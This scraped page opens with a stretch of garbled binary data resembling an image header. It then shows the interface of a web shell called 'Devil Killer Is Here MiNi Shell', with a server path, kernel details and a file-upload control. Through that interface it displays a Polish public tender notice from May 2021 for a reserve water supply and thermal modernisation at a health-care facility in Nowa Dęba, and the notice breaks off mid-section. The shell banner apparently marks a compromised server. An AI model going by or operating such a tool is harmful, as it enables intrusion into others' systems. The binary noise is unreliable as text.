JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210517/0005642602-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00056426 z dnia 2021-05-17</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja i budowa rezerwowego źródła wody oraz termomodernizacja budynku w SPZZOZ w Nowej Dębie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000563298</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. M.C. Skłodowskiej 1 a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nowa Dęba</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">39-460</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mwarchol@zoznowadeba.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">zoznowadeba.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Nowej Dębie </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja i budowa rezerwowego źródła wody oraz termomodernizacja budynku w SPZZOZ w Nowej Dębie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-663ded1e-b6f1-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00056426</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00009773/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Modernizacja i budowa rezerwowego źródła wody oraz termomodernizacja budynku w SPZZOZ Nowej Dębie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zoznowadeba.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zoznowadeba.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zostały<br/>szczegółowo opisane w SWZ Pkt. XII, XIII, XVII. Szczegółowe instrukcje użytkowania platformy<br/>zakupowej na której prowadzone będzie postępowanie znajduje się na platformie zakupowej<br/>Zamawiającego w zakładce ,,Regulacje i procedury procesu zakupowego” - ,,Instrukcje dla Wykonawcy<br/>dla postępowań opublikowanych od 01.01.2021”. Wymagania sprzętowo-aplikacyjne umożliwiające<br/>pracę na Platformie Zakupowej tj.:1.1) Stały dostęp do sieci Internet o gwarantowanej przepustowości<br/>nie mniejszej niż 512 kb/s;2) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min<br/>2GBRam, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4,<br/>Linux, lub ich nowsze wersje;3) Zainstalowana dowolna przeglądarka internetowa obsługująca TLS<br/>1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;4) Włączona<br/>obsługa JavaScript;5) Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie<br/>.pdf.2. Zamawiający określa dopuszczalny format podpisu elektronicznego, jako: 1) dokumenty w<br/>formacie „pdf" zaleca się podpisywać formatem PadES, 2) dopuszcza się podpisanie dokumentów w<br/>formacie innym niż „pdf", wtedy będzie wymagany oddzielny plik z podpisem. W związku z<br/>tym Wykonawca będzie zobowiązany załączyć prócz podpisanego dokumentu oddzielny plik z<br/>podpisem.3) prawidłowym będzie złożenie oferty w ten sposób, że Wykonawca przekazuje<br/>Zamawiającemu zaszyfrowany plik zawierający ofertę (jeżeli system komunikacji zakłada obowiązek<br/>szyfrowania) opatrzoną właściwym podpisem lub plik oferty wraz z plikiem podpisu (w przypadku<br/>podpisu zewnętrznego), przy czym opatrzenie oferty podpisem nastąpiło przed zaszyfrowaniem oferty.<br/>Dopuszczalne jest również, aby Wykonawca przekazał Zamawiającemu swoją ofertę w tzw. „paczce”<br/>dokumentów elektronicznych (tj. w skompresowanym archiwum dokumentów elektronicznych,<br/>które najczęściej zapisane jest w formacie ZIP) wraz z właściwym podpisem dołączonym jako plik<br/>podpisu do paczki dokumentów elektronicznych przed jej zaszyfrowaniem, o czym wprost stanowi § 8<br/>Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U.<br/>z 2020 r., poz. 2452). 3. Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o<br/>wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif,<br/>tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html,<br/>xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.4.Zamawiający<br/>określa informacje na temat kodowania i czasu odbioru danych tj.: 1)Plik załączony przez<br/>Wykonawcęna Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format<br/>kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez<br/>Zamawiającego po upływie terminu otwarcia ofert.5. Oznaczenie czasu odbioru danych przez<br/>Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera<br/>synchronizowanego odpowiednim źródłem czasu.6. Zgłoszenie do postępowania wymaga zalogowania<br/>Wykonawcy do Systemu na subdomenie Nazwa Jednostki; https://zoznowadeba.ezamawiajacy.pl, lub<br/>https://oneplace.marketplanet.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych<br/>wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016<br/>r., str. 1; zwanym dalej „RODO”) informujemy, że: 1) Administratorem (w rozumieniu art. 4 pkt. 7RODO)<br/>Pani/Pana danych osobowych jest Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej, ul. M.<br/>C. Skłodowskiej 1a, 39-460 Nowa Dęba, tel. 15 846-26-51 wew. 120; 2) Administrator wyznaczył<br/>Inspektora Danych Osobowych Panią Ewę Fils, z którą można się kontaktować pod adresem e-mail:<br/>iod@zoznowadeba.pl oraz telefonicznie pod numerem: 15 846-26- 51 wew. 168. 3) Odbiorcą<br/>Pani/Pana danych osobowych będą upoważnieni pracownicy SPZZOZ w Nowej Dębie oraz spółka<br/>Otwarty Rynek Elektroniczny S. A. siedzibą w Warszawie (02-672) przy ul. Domaniewskiej 49, wpisaną<br/>do Rejestru Przedsiębiorców Krajowego Rejestru Sądowego, prowadzonego przez Sąd Rejonowy dla<br/>m.st. Warszawy w Warszawie XIII Wydział GospodarczyKrajowego Rejestru Sądowego pod numerem<br/>KRS: 0000041441, REGON: 017282436, NIP: 526-25- 35-153, jako właściciel Platformy Zakupowej,<br/>na której SPZZOZ w Nowej Dębie prowadzi postępowania o udzielenie zamówienia publicznego,<br/>działającą pod adresem: https://zoznowadeba.ezamawiajacy.pl . 4) Pani/Pana dane osobowe<br/>przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym bez<br/>negocjacji. 5) Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 Ustawy Pzp. 6) Pani/Pana<br/>dane osobowe będą przechowywane, zgodnie z art. 78 ust.1 Ustawy Pzp przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,<br/>okres przechowywania obejmuje cały czas trwania umowy. 7) Obowiązek podania przez Panią/Pana<br/>danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisanych Ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego. 8) W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w<br/>sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>SEKCJA IV</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SPZZOZ.NT.III.382-11/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Modernizacja i budowa rezerwowego źródła wody oraz termomodernizacja budynku w SPZZOZ w Nowej Dębie, tj.:<br/> 1.1. Budowa zapasowych dwóch zbiorników wody pitnej o pojemności 21 m3 każdy wraz z hydrofornią, zasilaniem i układem sterowania w istniejących pomieszczeniach po byłej stacji uzdatniania wody oraz budowa przyłączy wody, kanalizacji sanitarnej i instalacji elektrycznej na działkach nr 159/2, 367/7 w Nowej Dębie, polegającej na zapewnieniu zapasu wody pitnej na min. 12 h. Projektowane zbiorniki zasilane będą z sieci miejskiej miasta Nowa Dęba. Sieć wodociągowa z przebudowanego systemu włączona będzie do istniejącej sieci rozdzielczej. <br/> 1.2. Prace termomodernizacyjne budynku polegające na:<br/> 1) dociepleniu stropodachu,<br/> 2) odprowadzenie wody deszczowej z dachu, <br/> 3) remont i docieplenie kominów,<br/> 4) docieplenie fundamentów<br/> 5) roboty związane z chodnikami i opaską wokół budynku,<br/> 6) docieplenie ścian,<br/> 7) roboty związane z daszkami i kartami okiennymi,<br/> 8) stolarka drzwiowa i okienna,<br/> 9) wykonanie podłogi na gruncie, <br/>1.3. Wykonawca zapewni serwisowanie i przeglądy techniczne urządzeń objętych zamówieniem – w okresie udzielonej gwarancji. Serwis i przeglądy techniczne powinny być prowadzone w terminach uzgodnionych z Zamawiającym i wyznaczonych przez producenta/sprzedawcę urządzeń oraz w przypadku konieczności stwierdzonej przez Zamawiającego. Serwis w przypadku stwierdzonej awarii oraz naprawy gwarancyjne obejmą również bezpłatną wymianę uszkodzonych lub zużytych części na elementy nowe.<br/> 2. Szczegółowy opis przedmiotu zamówienia w zakresie Modernizacja i budowa rezerwowego źródła wody został określony w dokumentacji technicznej, na którą składa się dokumentacja projektowa, Specyfikacje Techniczne Wykonania <br/>i Odbioru Robót Budowlanych i przedmiary robót (Załącznik nr 3a do SWZ). <br/>Dla termomodernizacji budynku został opracowany przedmiar robót (Załącznik 3 b do SWZ).<br/>3. Przedmiary robót mają charakter pomocniczy i służą do zobrazowania skali robót budowlanych, mają one za zadanie pomóc wykonawcom w oszacowaniu kosztów zamówienia.<br/>4. Koszty dostawy i montażu wszelkich urządzeń i instalacji muszą zawierać całość kosztów związanych z realizacją, w tym wykonanie projektów wykonawczych w uzgodnieniu <br/>z inwestorem, jeśli takie będą niezbędne do należytego wykonania całości zadania oraz <br/>uzyskania certyfikatów, dopuszczenia do użytkowania oraz koszty rozruchu, instruktaży, szkoleń oraz gwarancji.<br/>5. Wbudowane i dostarczone przez Wykonawcę materiały winny posiadać atesty, certyfikaty, deklaracje zgodności. Na każde żądanie Zamawiającego lub inspektora nadzoru Wykonawca obowiązany jest okazać w stosunku do wskazanych materiałów: certyfikat zgodności z Polską normą lub aprobatę techniczną.<br/>Wykonawca wykona przedmiot umowy z własnych materiałów.<br/>6. Wymagany okres gwarancji na wykonane roboty ( materiały i robociznę) wynosi min 2 lata od dnia odebrania przez Zamawiającego robót budowlanych i podpisania protokołu końcowego. <br/>7. Jeżeli w jakimkolwiek miejscu w SWZ oraz w załącznikach do niej tj. Projekcie – opisach technicznych i rysunkach, przedmiarach robót, Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych, zostały wykazane nazwy producenta, nazwy własne, znaki towarowe, patenty lub pochodzenie materiałów czy urządzeń służących do wykonania niniejszego zamówienia – wszędzie tam Zamawiający dodaje wyraz „lub równoważne”.<br/>8. Zamawiający informuje, że określając przedmiot zamówienia poprzez wskazanie nazw handlowych, dopuszcza jednocześnie wszelkie ich odpowiedniki rynkowe nie gorsze niż wskazane. Parametry wskazanego przez zamawiającego standardu przedstawiają warunki techniczne, eksploatacyjne, użytkowe, funkcjonalne oraz inne cechy istotne dla przedmiotu zamówienia. Natomiast wskazana marka lub nazwa handlowa określa klasę produktu, a nie konkretnego producenta. Zamawiający dopuszcza możliwość składania ofert równoważnych w stosunku do opisanych i podanych w wymaganych parametrach <br/>w SWZ pod warunkiem, że będą posiadały nie gorsze parametry techniczne.<br/>9. Zamawiający informuje, że opisując przedmiot zamówienia przez odniesienie <br/>do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych <br/>i systemów referencji technicznych, dopuszcza rozwiązania równoważne opisywanym,<br/>a odniesieniu takiemu towarzyszą wyrazy „lub równoważny”.<br/>10.Do materiałów i urządzeń wskazanych w dokumentacji projektowej, dla których są wskazane nazwy producenta, nazwy własne, znaki towarowe, patenty lub pochodzenie można stosować materiały i urządzenia równoważne pod względem parametrów technicznych, jakościowych, funkcjonalnych oraz użytkowych. Przewidziane do zastosowania urządzenia i materiały powinny spełniać parametry określone <br/>w dokumentacji projektowej i nie powinny być gorsze od założeń projektowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44611500-1 - Zbiorniki na wodę</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> • Zdolności techniczne:<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca udowodni iż w okresie pięciu lat przed terminem składania ofert, a jeżeli okres działalności jest krótszy w tym okresie wykonał jedno zamówienie polegające na rozbudowie, budowie, przebudowie jednego budynku wraz z instalacjami sanitarnymi, elektrycznymi  o wartości co najmniej 500 000,00 zł brutto (pięćset tysięcy złotych brutto);<br/> • Zdolności zawodowe:<br/>Wykonawca skieruje do realizacji osobę o następujących uprawnieniach:<br/> a) o specjalności konstrukcyjno – budowlanej lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów,<br/> b) o specjalności instalacyjnej - sanitarnej lub odpowiadające im uprawnienie budowlane wydane na podstawie wcześniej obowiązujących przepisów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. a) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 Ustawy Pzp, sporządzonych nie wcześniej<br/>niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>b) Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu o braku podstaw<br/>wykluczenia, o którym mowa powyżej w SWZ pkt. XI.1. zgodnie z wzorem Załącznik nr 6 do<br/>SWZ.2.Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa wyżej w punkcie 1.a), zastępuje się je w całości lub części dokumentem<br/>zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych<br/>do jego reprezentacji, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo<br/>organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce<br/>zamieszkania Wykonawcy.3. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce<br/>zamieszkania, nie wydaje się dokumentów, o których mowa wyżej w punkcie 1.a), zastępuje się je w<br/>całości lub części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem<br/>osoby albo osób uprawnionych do jego reprezentacji, złożone przed notariuszem lub przed organem<br/>sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze<br/>względu na siedzibę lub miejsce zamieszkania Wykonawcy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty - Załącznik nr 7 do SWZ;<br/>2. Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji 